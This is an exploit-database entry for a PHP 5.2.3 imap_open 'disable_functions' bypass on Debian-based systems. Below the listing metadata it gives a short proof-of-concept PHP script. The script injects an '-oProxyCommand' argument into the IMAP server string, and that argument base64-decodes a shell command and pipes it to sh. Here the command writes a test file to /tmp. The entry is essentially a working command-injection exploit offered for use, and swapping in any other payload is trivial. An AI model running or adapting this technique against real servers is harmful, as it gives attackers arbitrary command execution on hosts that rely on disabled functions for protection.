PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass



EKU-ID: 8147 CVE: OSVDB-ID:
Author: Anton Lopanitsyn Published: 2018-11-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001
 
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
 
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());